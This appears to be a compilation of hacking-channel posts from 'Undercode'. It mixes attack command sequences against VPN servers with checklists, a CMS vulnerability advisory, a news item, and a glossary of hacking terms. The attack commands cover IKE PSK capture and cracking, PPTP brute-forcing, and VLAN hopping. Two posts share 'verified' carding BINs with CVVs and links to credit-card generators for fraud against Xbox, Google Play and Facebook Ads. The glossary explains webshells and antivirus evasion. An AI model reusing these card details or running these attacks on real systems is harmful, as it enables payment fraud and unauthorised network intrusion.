UNDERCODE SECURITY
🦑 WELCOME TO UNDERCODE TESTING: LEARN HACKING | PROGRAMMING | SECURITY & more.

THIS CHANNEL IS BY:

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOS)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 VPN HACKING METHODS & MORE

# VPN Hacking
- Identify VPN servers:
./udp-protocol-scanner.pl -p ike $ip

- Scan a range for VPN servers:
./udp-protocol-scanner.pl -p ike -f ip.txt

# Use IKEForce to enumerate or dictionary attack VPN servers:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git

# Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic

# Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1

# Use ike-scan to capture the PSK hash:
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
ike-scan -M -A -n example_group -P hash-file.txt TARGET-IP

# Use psk-crack to crack the PSK hash:
psk-crack hash-file.txt
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key


# PPTP Hacking
Identifying PPTP: it listens on TCP port 1723.
Nmap PPTP fingerprint:

nmap -Pn -sV -p 1723 TARGET(S)

PPTP dictionary attack:

thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst


# VLAN Hopping
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh

enjoy ❤️👍🏻
✅ git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 The right steps for Information Gathering

1) Manually explore the site

2) Spider/crawl for missed or hidden content

3) Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store

4) Check the caches of major search engines for publicly accessible sites

5) Check for differences in content based on User-Agent (e.g. mobile sites, access as a search engine crawler)

6) Perform Web Application Fingerprinting

7) Identify technologies used

8) Identify user roles

9) Identify application entry points

10) Identify client-side code

11) Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)

12) Identify co-hosted and related applications

13) Identify all hostnames and ports

14) Identify third-party hosted content

enjoy ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Steps for good Configuration Management testing:

1) Check for commonly used application and administrative URLs

2) Check for old, backup and unreferenced files

3) Check HTTP methods supported and Cross Site Tracing (XST)

4) Test file extensions handling

5) Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)

6) Test for policies (e.g. Flash, Silverlight, robots)

7) Test for non-production data in live environment, and vice-versa

8) Check for sensitive data in client-side code (e.g. API keys, credentials)
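Steps 3 and 5 above can be checked from a single captured response. The following is an added Python example, not UNDERCODE's code: it audits a response's headers plus the Allow list returned to an OPTIONS request. The header set, the one-year HSTS threshold and the two sample responses are my own constructed assumptions.

```python
# Added example: audit one HTTP response for the checks in steps 3 and 5
# (security headers, risky methods such as TRACE). The header set and the
# one-year HSTS threshold are assumptions, not a standard from the page.

def _hsts_ok(value):
    """True if Strict-Transport-Security carries a max-age of >= 1 year."""
    try:
        age = value.lower().split("max-age=")[1].split(";")[0].strip()
        return int(age) >= 31536000
    except (IndexError, ValueError):
        return False

# Header name -> predicate that says whether its value is strong enough.
REQUIRED_HEADERS = {
    "content-security-policy": lambda v: "default-src" in v.lower(),
    "x-frame-options": lambda v: v.strip().upper() in ("DENY", "SAMEORIGIN"),
    "strict-transport-security": _hsts_ok,
    "x-content-type-options": lambda v: v.strip().lower() == "nosniff",
}

def audit_response(headers, allow_header=None):
    """Return a list of findings for one response.

    headers: dict of header name -> value (names matched case-insensitively).
    allow_header: the Allow value returned to an OPTIONS request, if known."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    for name, strong in REQUIRED_HEADERS.items():
        if name not in h:
            findings.append(f"missing header: {name}")
        elif not strong(h[name]):
            findings.append(f"weak value for {name}: {h[name]}")
    # Step 3: TRACE enables Cross Site Tracing (XST); PUT/DELETE on a plain
    # web server usually means WebDAV or a misconfiguration worth a look.
    methods = {m.strip().upper() for m in (allow_header or "").split(",")}
    for m in ("TRACE", "PUT", "DELETE"):
        if m in methods:
            findings.append(f"risky method advertised: {m}")
    return findings

# Constructed sample responses (not captured from any real site).
WEAK = ({"Server": "nginx", "X-Frame-Options": "ALLOWALL"}, "GET, POST, TRACE")
HARDENED = ({"Content-Security-Policy": "default-src 'self'",
             "X-Frame-Options": "DENY",
             "Strict-Transport-Security": "max-age=63072000; includeSubDomains",
             "X-Content-Type-Options": "nosniff"}, "GET, HEAD, POST")

if __name__ == "__main__":
    for label, (hdrs, allow) in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_response(hdrs, allow) or ["no findings"])
```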

enjoy ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
βœ…x3 Bins For Xbox Live

Bin : 519603203xxxxxx1
519603204xxxxxx2
5196032051xxxx00

Date: 22/07

CVV : 706
IP : USA πŸ‡ΊπŸ‡Έ

only verified by Us
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Britain, the United States and Canada say Russian intelligence agencies are trying to steal Covid-19 vaccine research results
#News

> The governments of the United Kingdom, the United States and Canada accused the Russian National Intelligence Agency of hacking into international pharmaceutical and academic research institutions with a view to winning the competition to develop the Covid-19 vaccine.

> It is unclear whether the research institute was damaged, or whether the vaccine project was blocked by hacking, but the above-mentioned national officials warned that cyber attacks are still in progress.

> The UK’s National Cyber Security Centre (NCSC) said in an unexpected statement on Thursday that vaccine and treatment departments in multiple countries have been targeted. However, the institution did not list the names and number of institutions affected by this.

> The United Kingdom refers to the hacking organization named APT29, saying it is "almost certainly" an integral part of the Russian national intelligence service. The group is also known as Cozy Bear or The Dukes, targeting vaccine development organizations in the United Kingdom, United States and Canada.

> According to NCSC, malicious activities have been ongoing, mainly aimed at government, diplomacy, think tanks, health and energy targets, aimed at stealing valuable intellectual property.

> Russia denied any involvement in hacking activities against the new coronavirus vaccine. Kremlin spokesman Dmitry Peskov told Bloomberg: "We don't know who might have hacked into pharmaceutical companies and research centers. We can only say that Russia has nothing to do with these attempts."


#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
SOME EXPERT EXPLOIT TUTORIALS
Forwarded from Backup Legal Mega
Paid guide: Linux Privilege Escalation Full by cybermentor:

https://mega.nz/folder/tLhlmKrD#5wrymtsKHTt1gBDLF8a1Sg -
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 INTERESTING NEW BUG - DESCRIPTION:

> "WonderCMS is a free simple website builder. Aimed to be extremely easy
to install (1 step), light and simple to use. It's an open source flat
file CMS (Content Management System), built with PHP and developed
since 2008."

> Vulnerability overview/description:
-----------------------------------
1. Stored Cross Site Scripting via Filename (Authenticated user)
This vulnerability allows an authenticated user (admin) to upload files
with a malicious client side script as the filename. It will be executed in
the browser of any user who visits the manipulated URL.

2. Directory Traversal (Authenticated user)
This vulnerability allows an authenticated user (admin) to delete arbitrary
files via directory traversal on the operating system with the access rights
of the web server.

3. Upload of arbitrary files (Authenticated user)
It was identified that an authenticated user (admin) can bypass file type
checks and upload malicious files. In this specific case, arbitrary server
side PHP code such as web shells can be uploaded. As a result the attacker
can run arbitrary code on the server side with the privileges of the web
server. This could lead to a full system compromise.
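The three issues above are three input-handling defects: an unsanitised filename echoed into a page, a delete path that is not confined to the upload directory, and an extension check that can be bypassed. As an added Python example (not WonderCMS code, which is PHP; the extension allowlist and directory layout are my assumptions), here is the hardened handling for each, with a constructed scenario exercising the traversal check.

```python
import re
import tempfile
from pathlib import Path
# Assumed for this added example (not WonderCMS code): the only extensions an
# upload may carry. Nothing the web server would execute is in the set.
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif", "pdf", "txt", "zip"}

def safe_filename(name):
    """Vuln 1: drop path parts and everything outside [A-Za-z0-9._-], so no
    '<', '=' or quote survives in a name that is later echoed into a page."""
    base = Path(name.replace("\\", "/")).name
    base = re.sub(r"[^A-Za-z0-9._-]+", "_", base).strip("._")
    return base or "file"

def allowed_upload(name):
    """Vuln 3: allowlist every extension in the chain, case-insensitively,
    so 'shell.php.jpg' and 'a.PHP' are rejected, not just 'shell.php'."""
    parts = name.lower().split(".")[1:]
    return bool(parts) and all(p in ALLOWED_EXT for p in parts)

def resolve_inside(upload_dir, requested):
    """Vuln 2: resolve a path meant for deletion and refuse anything that
    leaves upload_dir via '../' chains, symlinks or an absolute path."""
    root = Path(upload_dir).resolve()
    target = (root / requested).resolve()
    if target != root and root not in target.parents:
        raise ValueError(f"path escapes upload directory: {requested}")
    return target

def delete_upload(upload_dir, requested):
    # Delete a regular file inside upload_dir only; True if one was removed.
    target = resolve_inside(upload_dir, requested)
    if not target.is_file():
        return False
    target.unlink()
    return True

def demo_traversal():
    """Constructed scenario; returns (inside deleted, escape refused, outside kept)."""
    with tempfile.TemporaryDirectory() as tmp:
        uploads = Path(tmp, "uploads")
        uploads.mkdir()
        (uploads / "ok.txt").write_text("inside")
        Path(tmp, "secret.txt").write_text("outside")
        removed = delete_upload(uploads, "ok.txt")
        try:
            delete_upload(uploads, "../secret.txt")
            refused = False
        except ValueError:
            refused = True
        return removed, refused, Path(tmp, "secret.txt").exists()
```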


🦑 Proof of concept:
-----------------
1. Stored Cross Site Scripting via Filename (Authenticated user)

[ PoC has been removed as no patch is available and the vendor is unresponsive ]

2. Directory Traversal (Authenticated user)

[ PoC has been removed as no patch is available and the vendor is unresponsive ]

3. Upload of arbitrary files (Authenticated user)

[ PoC has been removed as no patch is available and the vendor is unresponsive ]

🦑 Vulnerable / tested versions:
-----------------------------
WonderCMS version 3.0.7 has been tested, which was the latest version
available at the time of the test. Previous versions may also be affected.

On 18-05-2020, the vendor released a newer version 3.1.0. However, the latest
version is still vulnerable to the above vulnerabilities.

source deeepweb
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 MongoDB database backup and recovery

// Back up the entire database to the specified directory
mongodump -h dbhost -d dbname -o dbdirectory
mongodump -h 192.168.0.1 -d mydatabase -o D:\bak

// Restore the entire database from that dump directory
mongorestore -h dbhost -u user -p pass dbdirectory
mongorestore -h 192.168.0.2 -u "root" -p "123" D:\bak
———————————————————————————
// Back up only the collection mytable to the specified directory
mongodump -h dbhost -d dbname -c collectionname -o dbdirectory
mongodump -h 192.168.0.1 -d mydatabase -c mytable -o D:\bak\mytable

// Restore a single collection
mongorestore -h 192.168.0.2 -d mydatabase D:\bak\mytable
———————————————————————————
// mongoexport can also back up a single collection, but it writes one export file (JSON by default) rather than a BSON dump directory
mongoexport -h dbhost -d dbname -c collectionname -o outputfile
mongoexport -h 192.168.0.1 -d mydatabase -c mytable -o E:\bak\mytable.bak

// Use mongoimport to restore the specified file into the database
mongoimport -h dbhost -d dbname -c collectionname --file inputfile
mongoimport -h 192.168.0.2 -d mydatabase -c mytable --file E:\bak\mytable.bak



▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
πŸ¦‘Some working New bins :


1) BIN PUBG MOBILE

401893xxxxxxxxxx

CCV/FECHA: RND (Random)

IP: USA

πŸ„β€β™‚οΈBest Cc generators : https://t.me/UNDERCODEHACKING/2150

2) New BIN Facebook Ads 25$

BIN : https://www.file4.net/f-1lUf

IP : USA

Zip Code : 57108

2) BIN GOOGLE PLAY

BIN: https://www.file4.net/f-1lUf
FECHA: 06/24. (By all bin)

CVV: Generado

IP USA πŸ‡ΊπŸ‡Έ

πŸ„β€β™‚οΈBest Cc generators : https://t.me/UNDERCODEHACKING/2150


verifiedβœ…
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 SOME IMPORTANT TERMS BY UNDERCODE:

1) Weak password

Refers to passwords that are not strong enough and are easy to guess. Passwords like 123456, abc123, abcdefg and woainixiaofeng are a common way in for hackers. About 20 of every 100 passwords are weak passwords of this kind.

2) shell

Refers to a command execution environment. For example, pressing the Windows key + R on the keyboard opens the "Run" dialog; entering "cmd" there brings up a black window in which you can run commands. You have probably seen this window online or in a hacker movie: it is the Windows shell execution environment. In the days before the mouse, when there was only a keyboard, every operation on the computer was done through it!

3) WebShell

A WebShell is a command environment that exists in the form of an asp, php, jsp or other web file; it can also be called a web page backdoor. After hackers break into a website they usually mix these asp or php backdoor files in with the normal page files in the web directory of the website server, and they usually hide them as deeply as possible so that the administrator cannot find them, because if the files are deleted the attacker loses control of the website. Once a website has a webshell backdoor on it you can basically do whatever you want: modify any part of the website or delete it. Trading of websites between hackers is done through webshells, for example "how much does it cost me to buy the webshell access to this website", and the attacker is responsible for finding a way to plant the webshell backdoor on that website. That should make the idea clear.

4) injection

In a website built on the B/S (browser/server) structure, basically every site needs a database. A user submits a database query and, from the results the program returns, obtains the data they want to know; that is normal use. But if the query statement is modified into malicious code, it becomes destructive. This is the so-called SQL injection, the most aggressive web page vulnerability and the culprit behind countless enterprise sites being broken into.

5) Injection point

Refers to a place where SQL injection can be performed, generally a web page address with parameters. The permissions you obtain depend on the account permissions of the database behind the injection point.
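Entries 4 and 5 describe an injection point without showing one. As an added Python example that is not UNDERCODE's code (the sample table and its rows are constructed), here is a lookup that pastes the parameter into the SQL text next to its parameterised replacement, plus a defender's check that tells the two apart.

```python
import sqlite3

def make_db():
    """Constructed sample table (added example, not UNDERCODE's code)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "admin"), (2, "bob", "user"), (3, "carol", "user")])
    return db

def lookup_vulnerable(db, name):
    """An injection point: the parameter is pasted into the SQL text, so the
    caller controls the statement itself, not just the compared value."""
    sql = f"SELECT name FROM users WHERE name = '{name}' ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def lookup_safe(db, name):
    """Parameterised query: the driver binds the value separately, so quotes
    inside it can never change the statement's structure."""
    sql = "SELECT name FROM users WHERE name = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (name,))]

def is_injection_point(db, lookup):
    """Defender's check for a lookup function: a tautology in the parameter
    must not return more rows than the honest value does."""
    honest = lookup(db, "bob")
    probe = lookup(db, "bob' OR '1'='1")
    return len(probe) > len(honest)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, "bob' OR '1'='1"))  # every user
    print("safe:      ", lookup_safe(db, "bob' OR '1'='1"))        # nothing
```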


6) Intranet

Generally speaking, a local area network, such as an Internet cafe, a campus network or a company intranet. If the IP address falls within one of the following three ranges, we are on an intranet: 10.0.0.0-10.255.255.255, 172.16.0.0-172.31.255.255, 192.168.0.0-192.168.255.255.


7) Extranet

Connected directly to the Internet, so that any computer can reach any other; reaching the external network from an intranet requires a broadband connection.

8) Kill

Short for anti-virus evasion (anti-kill): changing a program by packing, encrypting, modifying its signature bytes, adding flower instructions and so on, so that it escapes detection and removal by anti-virus software. The Trojans generated by the remote-control tools mentioned earlier are often caught by anti-virus software and therefore cannot take control of the computer, so anti-kill techniques are used to avoid the anti-virus scan, making the anti-virus software mistake the Trojan for safe software and not intercept it.

9) Flower instruction

Just a few assembly instructions that make some jumps within the assembly code, so that anti-virus software cannot correctly judge the structure of the virus file. Put simply: "anti-virus software searches for the virus in order from head to toe; if we swap the virus's head and feet, the anti-virus software will not find the virus."

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁